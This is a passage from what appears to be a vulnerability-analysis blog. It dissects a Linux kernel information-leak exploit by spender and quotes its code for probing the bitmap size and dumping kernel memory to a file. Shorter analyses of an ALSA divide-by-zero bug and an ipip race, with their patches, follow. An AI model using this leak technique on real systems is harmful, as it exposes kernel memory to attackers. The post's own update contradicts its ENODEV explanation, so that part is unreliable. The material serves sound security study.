	   towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
	   which will be set for our single node -- this gives us the size of the bitmap
	*/
	for (i = 0; i < 512; i++) {
		node = i;
		ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
		if (errno == ENOSYS) {
			fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
			exit(1);
		} else if (errno == ENODEV) {
			found_gap = 1;
		} else if (found_gap == 1) {
			max_numnodes = i;
			fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
			break;
		}
	}

After allocating 4KB using malloc(3), there's a neat trick to retrieve the size of the bitmap. What spender does is invoke move_pages(2) with node values from 0 to 511. If the error code returned is 'ENODEV', node_state() failed for that value, meaning that the bit is clear, and 'found_gap' is set. The first value after such a gap that doesn't fail with 'ENODEV' is the first bit of the adjacent bitmap, so its index is the size of the bitmap in bits. This is taken as the 'MAX_NUMNODES' value, so the code updates 'max_numnodes' with it and breaks out of the loop.
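
The scan can be modelled in user space like this, assuming (as the comment in the exploit does) a single-node system where the first bit of each bitmap is set. detect_bitmap_bits() is a hypothetical helper that reads bits from a buffer instead of probing with move_pages(2):

```c
#include <assert.h>
#include <stddef.h>

/* Walks bit indexes 0..limit-1 and returns the index of the first set bit
 * that follows at least one clear bit, or -1 if there is none. A clear bit
 * plays the role of an ENODEV result in the exploit. */
int detect_bitmap_bits(const unsigned char *bits, int limit)
{
	int found_gap = 0;
	int i;

	assert(bits != NULL && limit >= 0);
	for (i = 0; i < limit; i++) {
		int set = (bits[i / 8] >> (i % 8)) & 1;

		if (!set)
			found_gap = 1;       /* inside the gap after node 0 */
		else if (found_gap)
			return i;            /* first bit of the adjacent bitmap */
	}
	return -1;
}
```

For two adjacent 64-bit bitmaps that each have only bit 0 set, the function returns 64.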

	if (node_online_map != 0)
		our_base = node_online_map;
	/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
	   of each bitmap in the array our base is in the middle of
	   we've taken account for all this
	*/
	else if (node_states != 0)
		our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
	else {
		fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
		exit(1);
	}

	return 0;
}
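
The 'our_base' expression at the end of prepare() is easier to follow with numbers. The sketch below mirrors it; high_memory_bitmap_base() is a hypothetical helper and the address used in the example is made up:

```c
#include <assert.h>

/* Hypothetical helper mirroring the expression in prepare(): given the
 * address of node_states[], the detected bitmap width in bits and whether
 * HIGHMEM is present, returns node_states plus two or three bitmap sizes. */
unsigned long high_memory_bitmap_base(unsigned long node_states_addr,
				      int max_numnodes, int has_highmem)
{
	unsigned long bitmap_bytes;

	assert(max_numnodes > 0 && max_numnodes % 8 == 0);
	bitmap_bytes = (unsigned long)max_numnodes / 8;
	return node_states_addr + (has_highmem ? 3 : 2) * bitmap_bytes;
}
```

For example, with a 64-bit wide bitmap (8 bytes) and a made-up node_states address of 0x1000, the base is 0x1010 without HIGHMEM and 0x1018 with it. This presumably corresponds to N_HIGH_MEMORY being entry 2 or 3 of the node_states[] array, depending on CONFIG_HIGHMEM.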

The final segment of this function sets the 'our_base' variable. If the 'node_online_map' symbol was found, its address is used directly. Otherwise, if the 'node_states' symbol is non-zero, 'our_base' is calculated from its address; as the comment says, the offset depends on the HIGHMEM configuration option and on 'MAX_NUMNODES', since the latter determines the size of each bitmap in the array. If neither symbol is available, it simply assumes that the kernel isn't vulnerable. Finally, we have the trigger routine which starts like this:

int trigger(void)
{
	unsigned long addr;
	unsigned long addr2;
	unsigned char thebyte;
	unsigned char choice = 0;
	char ibuf[1024];
	char *p;
	FILE *f;

	// get lingering \n
	getchar();
	while (choice != '2') {
		menu();
		fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
		choice = ibuf[0];

So, this is a simple input parsing 'while' loop that reads the user's choice using fgets(3) until it's '2', which stands for "Quit" as we can read in the menu() routine. A common 'switch-case' structure follows…

		switch (choice) {
		case '0':
			fprintf(stdout, "Enter the symbol or address for the base:\n");
			fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
			p = strrchr((char *)&ibuf, '\n');
			if (p)
				*p = '\0';

In case the user requested the '0' option (which is the "Dump via symbol/address with length" option), it reads the symbol/address using fgets(3), strips the trailing newline and moves on to parsing it like this:

			addr = exp_state->get_kernel_sym(ibuf);
			if (addr == 0) {
				addr = strtoul(ibuf, NULL, 16);
			}
			if (addr == 0) {
				fprintf(stdout, "Invalid symbol or address.\n");
				break;
			}
			addr2 = 0;

Using the framework's callback get_kernel_sym() it attempts to resolve the input as a symbol; if that fails, the input is parsed as a hexadecimal address using strtoul(3). Next, it requests the number of bytes that the user wants to leak like this:

			while (addr2 == 0) {
				fprintf(stdout, "Enter the length of bytes to read in hex:\n");
				fscanf(stdin, "%x", &addr2);
				// get lingering \n
				getchar();
			}
			addr2 += addr;

Nothing really complicated to discuss here. The length is then added to the previously obtained address, so that 'addr2' points to the end of the range the user asked for. The following code uses a simple loop to perform the information leak, as you can see here:

			fprintf(stdout, "Leaked bytes:\n");
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				printf("%02x ", thebyte);
				addr++;
			}
			printf("\n");
			break;

This iterates from 'addr' up to the calculated end address, fetching one byte per iteration using get_byte_at_addr() and immediately printing it in hex. At last, it prints a new line character and breaks out of the 'switch'.
If the user selected the '1' option (which is "Dump entire range to file" in the exploit's menu), the following code path will be followed:

		case '1':
			addr = our_base -  0x10000000;
#ifdef __x86_64__
			/*
			   our lower bound will cause us to access
			   bad addresses and cause an oops
			*/
			if (addr < 0xffffffff80000000)
				addr = 0xffffffff80000000;
#else
			if (addr < 0x80000000)
				addr = 0x80000000;
			else if (addr < 0xc0000000)
				addr = 0xc0000000;
#endif

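After initializing the start address to 256MB below 'our_base', a compile-time pre-processor '#ifdef' clause picks the appropriate lower bound for 64-bit or 32-bit x86 architectures. On x86_64 the start address is clamped to 0xffffffff80000000 since, as the comment says, anything lower would access bad addresses and cause an oops. On 32-bit it is raised to 0x80000000 if it is below that, or to 0xc0000000 if it falls between the two, so that the calculated address remains in the kernel space range. It'll continue like this: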

			addr2 = our_base + 0x10000000;
			f = fopen("./kernel.bin", "w");
			if (f == NULL) {
				fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
				exit(1);
			}

It sets the upper bound to 256MB (0x10000000 in hex) above the base address and opens a file named "kernel.bin" for writing using fopen(3), exiting if that fails. Next…

			fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
			fflush(stdout);
			while (addr < addr2) {
				thebyte = get_byte_at_addr(addr);
				fputc(thebyte, f);
				if (!(addr % (128 * 1024))) {
					fprintf(stdout, ".");
					fflush(stdout);
				}
				addr++;
			}
			fprintf(stdout, "done.\n");
			fclose(f);
			break;

Iteratively, it invokes get_byte_at_addr() for every address in the range, which is up to 512MB (256MB below the base address and 256MB above it), and writes each byte to the previously opened file using fputc(3). It also displays its progress to the user by printing a dot for every 128KB and a "done." message when completed. Then it closes the file and breaks out of the 'switch'. At last, if the selection was '2' which stands for "Quit", it just breaks out of the 'switch' and the 'while' condition ends the loop like this:

		case '2':
			break;
		}
	}

	return 0;
}
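
To recap the '0' menu path in isolation, here is a minimal userspace sketch of the "symbol first, hex address second" parsing and of the byte-by-byte leak loop. Keep in mind that lookup_symbol(), fake_read_byte() and leak_range() are hypothetical stand-ins I made up for illustration: the real exploit uses the framework's get_kernel_sym() callback and its own get_byte_at_addr(), and nothing below touches kernel memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for get_kernel_sym(): 0 means "unknown symbol". */
static unsigned long lookup_symbol(const char *name)
{
	if (strcmp(name, "demo_symbol") == 0)
		return 0x1000UL;
	return 0;
}

/* Try the input as a symbol name first, then as a hex address.
 * A return value of 0 means the input was neither. */
static unsigned long parse_base(const char *input)
{
	unsigned long addr;

	assert(input != NULL);
	addr = lookup_symbol(input);
	if (addr == 0)
		addr = strtoul(input, NULL, 16);
	return addr;
}

/* Hypothetical stand-in for get_byte_at_addr(): returns the low byte
 * of the address so that the result is easy to predict. */
static unsigned char fake_read_byte(unsigned long addr)
{
	return (unsigned char)(addr & 0xff);
}

/* Same loop shape as the exploit: turn the length into an end address,
 * then read one byte per iteration. Returns the number of bytes read. */
static size_t leak_range(unsigned long addr, unsigned long len,
			 unsigned char *out)
{
	unsigned long end = addr + len;
	size_t n = 0;

	while (addr < end)
		out[n++] = fake_read_byte(addr++);
	return n;
}
```

With these stubs, parse_base("demo_symbol") resolves through the symbol table, parse_base("c0100000") falls back to strtoul(3), and an input that is neither ends up as 0, which is exactly the value the exploit treats as invalid.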

Finally, the post-exploitation function doesn't contain anything at all since this exploit leaves the kernel in a stable state that doesn't require any post-exploitation actions to take place.

int post(void)
{
	return 0;
}

You can also see this exploit code in action in a video that spender uploaded to YouTube which is available here.

P.S.: There might be mistakes in this post since I wrote it really, really quick and didn’t pay the appropriate attention because I didn’t have the time to do so, sorry.

Update:
A couple of minutes after my post spender informed me about some mistakes that my post had. Thanks once again for this and since I don’t have much time, here are his comments in his own words. I’m just copying/pasting them:

Should have shown the definition of node_states, as it would explain why I bother trying to figure out the bitmap size and explains the calculation involving highmem detection; also the range is 512 (256 below the base, 256 above). The node_online_map lookup is for older kernel support; ENODEV means the tested bit was 1, EACCES means it was 0.
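
To make the 512MB figure concrete, here is a minimal sketch of the range arithmetic from the '1' case for x86_64. The struct and function names are mine (hypothetical), and I use uint64_t so that the constants behave the same on any host; only the two constants come from the exploit code shown earlier.

```c
#include <assert.h>
#include <stdint.h>

#define DUMP_WINDOW  UINT64_C(0x10000000)         /* 256MB on each side of the base */
#define KERNEL_FLOOR UINT64_C(0xffffffff80000000) /* x86_64 lower bound used by the exploit */

struct dump_range {
	uint64_t start; /* first address that gets read */
	uint64_t end;   /* one past the last address that gets read */
};

/* Mirror of the exploit's arithmetic: 256MB below the base (clamped to
 * the lower bound) up to 256MB above the base. */
static struct dump_range compute_dump_range(uint64_t base)
{
	struct dump_range r;

	/* the sketch assumes a kernel-range base that doesn't wrap around */
	assert(base >= KERNEL_FLOOR);
	assert(base <= UINT64_MAX - DUMP_WINDOW);

	r.start = base - DUMP_WINDOW;
	if (r.start < KERNEL_FLOOR)
		r.start = KERNEL_FLOOR;
	r.end = base + DUMP_WINDOW;
	return r;
}
```

For a base of 0xffffffff90000000 this gives the full 0x20000000 (512MB) window, while a base close to the lower bound such as 0xffffffff81000000 gets clamped and dumps only 0x11000000 bytes.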

Linux kernel Alsa (hda-intel) Division by Zero Crash

•February 22, 2010 • Leave a Comment

This bug was discovered by Jody Bruchon who also provided a detailed bug report available on his site here. The susceptible code resides in sound/pci/hda/hda_intel.c, specifically in the function shown below.

static int bdl_pos_adj[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS-1)] = -1};
     ...
/*
 * Check whether the current DMA position is acceptable for updating
 * periods.  Returns non-zero if it's OK.
 *
 * Many HD-audio controllers appear pretty inaccurate about
 * the update-IRQ timing.  The IRQ is issued before actually the
 * data is processed.  So, we need to process it afterwords in a
 * workqueue.
 */
static int azx_position_ok(struct azx *chip, struct azx_dev *azx_dev)
{
        unsigned int pos;

        if (azx_dev->start_flag &&
            time_before_eq(jiffies, azx_dev->start_jiffies))
                return -1;      /* bogus (too early) interrupt */
        azx_dev->start_flag = 0;

        pos = azx_get_position(chip, azx_dev);
        if (chip->position_fix == POS_FIX_AUTO) {
                if (!pos) {
                        printk(KERN_WARNING
                               "hda-intel: Invalid position buffer, "
                               "using LPIB read method instead.\n");
                        chip->position_fix = POS_FIX_LPIB;
                        pos = azx_get_position(chip, azx_dev);
                } else
                        chip->position_fix = POS_FIX_POSBUF;
        }

        if (!bdl_pos_adj[chip->dev_index])
                return 1; /* no delayed ack */
        if (pos % azx_dev->period_bytes > azx_dev->period_bytes / 2)
                return 0; /* NG - it's below the period boundary */
        return 1; /* OK, it's fine */
}

Let’s have a quick look at it. The first ‘if’ condition checks whether the “stream full start flag” is set and whether the current jiffies value has not yet passed the stream’s start jiffies. If so, the interrupt came too early and the function immediately returns -1. Otherwise, it clears the “stream full start flag” and invokes azx_get_position() to retrieve the current DMA position of the given device. If the position fix mode is set to ‘POS_FIX_AUTO’ and the returned position is zero, it issues a warning message using printk(), changes the mode to ‘POS_FIX_LPIB’ and calls azx_get_position() again to obtain the position through the LPIB read method. If the position is non-zero, it sets the position fix mode to ‘POS_FIX_POSBUF’.
After this ‘if’ block we have the more interesting segment. If ‘bdl_pos_adj[]’ is zero for the device’s index, it returns 1 right away (no delayed ack). Otherwise, it checks where the position falls within the current period and returns either 0 or 1. However, as Jody Bruchon noticed, in some cases ‘azx_dev->period_bytes’, which represents the size of the period in bytes, could be zero. As we can read in his bug report…

Using mp3blaster-3.2.5 (latest version) to play MP3 audio, I am able to
crash the kernel by stopping and restarting playback using the "5" key
repeatedly.  This happens as a normal user, not only as root.  Kernel
backtrace points to azx_position_ok() dividing by zero, so wrote a tiny
patch to investigate which reported via printk() values of pos and
azx_dev->period_bytes; on crash, both were 0.  The offending operation
does: if (pos % azx_dev->period_bytes > azx_dev->period_bytes / 2)
which obviously is the source of the crash.

Obviously, the modulo operation results in a divide by zero if this is the case. To reproduce the bug, J. Bruchon did the following:

A small shell script or example program which triggers the problem (if possible)
mp3blaster-3.2.5 with repeated start/stop of playback consistently causes
this crash, without fail.  Just keep hitting "5" every three seconds.

And the patch was simply…

        if (!bdl_pos_adj[chip->dev_index])
                return 1; /* no delayed ack */
+       if (azx_dev->period_bytes == 0) {
+               printk(KERN_WARNING
+                      "hda-intel: Divide by zero was avoided "
+                      "in azx_dev->period_bytes.\n");
+               return 0;
+       }
        if (pos % azx_dev->period_bytes > azx_dev->period_bytes / 2)

This is a simple check against zero before moving on to the calculation. If ‘azx_dev->period_bytes’ is zero, it logs a warning and returns 0.
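
The same guard can be tried out in userspace. The following is just a minimal sketch of the patched tail of azx_position_ok() with the two values passed in directly; position_ok() and position_ok_selfcheck() are names I made up, and fprintf() stands in for printk().

```c
#include <assert.h>
#include <stdio.h>

/* Userspace model of the patched check: returns 1 if the position is
 * fine, 0 if it is not (or if the period size is zero). */
static int position_ok(unsigned int pos, unsigned int period_bytes)
{
	if (period_bytes == 0) {
		/* without this check the modulo below would trap */
		fprintf(stderr, "divide by zero was avoided in period_bytes\n");
		return 0;
	}
	if (pos % period_bytes > period_bytes / 2)
		return 0; /* NG, past the middle of the period */
	return 1; /* OK */
}

/* A few sample values, including the pos == 0 / period_bytes == 0
 * pair from the bug report. */
void position_ok_selfcheck(void)
{
	assert(position_ok(0, 0) == 0);
	assert(position_ok(100, 4096) == 1);
	assert(position_ok(3000, 4096) == 0);
}
```

Removing the first ‘if’ and calling position_ok(0, 0) is an easy way to see the crash in miniature, since an integer modulo by zero is undefined behavior in C and typically raises SIGFPE on x86.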

Book: Mind Magic

•February 22, 2010 • 2 Comments



Title: Mind Magic: Extraordinary Tricks to Mystify, Baffle and Entertain
Author: Marc Lemezma

This is a neat little book (less than 100 pages) which discusses some mind tricks used by magicians and/or mentalists for entertainment. I found it pretty nice and fun. The tricks described range from common tricks such as predicting a card from a deck of cards that someone selected to more impressive ones such as mind tricks for groups of people.
To conclude, if you have some spare time and you want to have fun with some friends, it’s a nice book, but don’t expect anything extremely advanced in it. :)

Linux kernel Tunnels Race Condition

•February 21, 2010 • 3 Comments

I read about this bug in Eugene Teo’s email to the oss-security mailing list. The issue was discovered by Alexey Dobriyan and here is the buggy code from net/ipv4/ipip.c as seen in the 2.6.32 release of the Linux kernel.

static int __init ipip_init(void)
{
        int err;

        printk(banner);

        if (xfrm4_tunnel_register(&ipip_handler, AF_INET)) {
                printk(KERN_INFO "ipip init: can't register tunnel\n");
                return -EAGAIN;
        }

        err = register_pernet_gen_device(&ipip_net_id, &ipip_net_ops);
        if (err)
                xfrm4_tunnel_deregister(&ipip_handler, AF_INET);

        return err;
}
       ...
module_init(ipip_init);

As you can read in the above module initialization routine, after printing the module’s banner using printk(), the code invokes xfrm4_tunnel_register(), a function located in net/ipv4/tunnel4.c that registers a new XFRM tunnel handler. In this case, that is the ‘ipip_handler’ structure for the ‘AF_INET’ family. The next call, register_pernet_gen_device(), registers the per-network-namespace initialization and cleanup callbacks of ‘ipip_net_ops’ and assigns the ‘ipip_net_id’ network ID. If this fails, it deregisters the previously registered tunnel handler.
As Alexey Dobriyan noticed, the receive hook of the new handler could be called right after the registration of the handler and before the registration of the network operations through register_pernet_gen_device(). If this is the case, then ipip_rcv() will be invoked since this is the registered handler as we can read below:

static struct xfrm_tunnel ipip_handler = {
        .handler        =       ipip_rcv,
        .err_handler    =       ipip_err,
        .priority       =       1,
};

Now, if we move to this routine we’ll read the following…

static int ipip_rcv(struct sk_buff *skb)
{
        struct ip_tunnel *tunnel;
        const struct iphdr *iph = ip_hdr(skb);

        read_lock(&ipip_lock);
        if ((tunnel = ipip_tunnel_lookup(dev_net(skb->dev),
                                        iph->saddr, iph->daddr)) != NULL) {
     ...
        return -1;
}

So, after taking the read lock it immediately calls ipip_tunnel_lookup(), which begins like this:

static struct ip_tunnel * ipip_tunnel_lookup(struct net *net,
                __be32 remote, __be32 local)
{
        unsigned h0 = HASH(remote);
        unsigned h1 = HASH(local);
        struct ip_tunnel *t;
        struct ipip_net *ipn = net_generic(net, ipip_net_id);
     ...
        return NULL;
}

As you can read, it invokes net_generic() from include/net/netns/generic.h, passing the possibly uninitialized ‘ipip_net_id’. This leads to the following BUG_ON() check…

struct net_generic {
        unsigned int len;
        struct rcu_head rcu;

        void *ptr[0];
};

static inline void *net_generic(struct net *net, int id)
{
        struct net_generic *ng;
        void *ptr;

        rcu_read_lock();
        ng = rcu_dereference(net->gen);
        BUG_ON(id == 0 || id > ng->len);
        ptr = ng->ptr[id - 1];
        rcu_read_unlock();

        return ptr;
}

Since the network operations may not have been registered yet, ‘ipip_net_id’ may still be zero (or beyond what the per-namespace array covers), so the ‘id’ check could trigger the above BUG_ON() macro and thus OOPS the kernel. To fix this the following patch was applied:

 	printk(banner);

-	if (xfrm4_tunnel_register(&ipip_handler, AF_INET)) {
+	err = register_pernet_device(&ipip_net_ops);
+	if (err < 0)
+		return err;
+	err = xfrm4_tunnel_register(&ipip_handler, AF_INET);
+	if (err < 0) {
+		unregister_pernet_device(&ipip_net_ops);
 		printk(KERN_INFO "ipip init: can't register tunnel\n");
-		return -EAGAIN;
 	}
-
-	err = register_pernet_device(&ipip_net_ops);
-	if (err)
-		xfrm4_tunnel_deregister(&ipip_handler, AF_INET);
-
 	return err;

Basically, this patch just re-orders the initialization code so that the network operations are registered first, before the handler callbacks. The exact same bug was present in IPv6 tunnels, SIT tunnels, XFRM6 tunnels and the GRE protocol.
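
The ordering problem is easy to model outside the kernel. Here is a minimal single-threaded sketch, assuming an ID of 0 means “not registered yet” just like in the BUG_ON() check above. All of the names are hypothetical, and where the kernel would hit BUG_ON() the model simply returns -1.

```c
#include <assert.h>
#include <stddef.h>

static int net_id;               /* 0 = per-net state not registered yet */
static int per_net_state = 42;   /* placeholder for the per-net data */
static int (*rcv_handler)(void); /* NULL = no tunnel handler registered */

/* Model of net_generic(): the kernel would BUG_ON(id == 0),
 * here we return NULL instead. */
static void *lookup_state(int id)
{
	if (id == 0)
		return NULL;
	return &per_net_state;
}

/* Model of the receive hook: it needs the per-net state to exist. */
static int rcv(void)
{
	return lookup_state(net_id) != NULL ? 0 : -1;
}

static void register_state(void)   { net_id = 1; }
static void register_handler(void) { rcv_handler = rcv; }
static void reset(void)            { net_id = 0; rcv_handler = NULL; }

/* A packet shows up: 1 = no handler yet so it is ignored,
 * 0 = handled fine, -1 = the kernel would have hit BUG_ON(). */
static int packet_arrives(void)
{
	if (rcv_handler == NULL)
		return 1;
	return rcv_handler();
}

/* Walk through both orderings with a packet arriving between the steps. */
void ordering_selfcheck(void)
{
	/* old order: handler first, state second */
	reset();
	register_handler();
	assert(packet_arrives() == -1); /* the race window */
	register_state();
	assert(packet_arrives() == 0);

	/* patched order: state first, handler second */
	reset();
	register_state();
	assert(packet_arrives() == 1);  /* harmless, no handler yet */
	register_handler();
	assert(packet_arrives() == 0);
}
```

With the patched order there is no point in time where the handler is reachable while the state it depends on is missing, which is all the fix does.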

xorl and the army…

•January 22, 2010 • 18 Comments

Hello good fellows!

This post is just to inform you that it’s time for me to fulfil my military service.

Since some of you might not be aware, in Greece military service is mandatory for every male citizen. Even wikipedia has an entry for this!!1 (lol)

Because of this, I won’t be able to make new posts, moderate comments and answer emails for the short period of time that I’ll be serving as a soldier.

Even though I have a few more days (about 10) as a free Greek citizen, I’ve decided that I won’t spend them on blogging :P

Of course, I’ll be updating my twitter when possible but I don’t think I’ll be able to write any new vulnerability analysis blog posts while in the army.

Anyway, I won’t waste more of your time with my crap. Just have fun with anything you do, and as always… Happy coding!!!!

See you soon.

.313.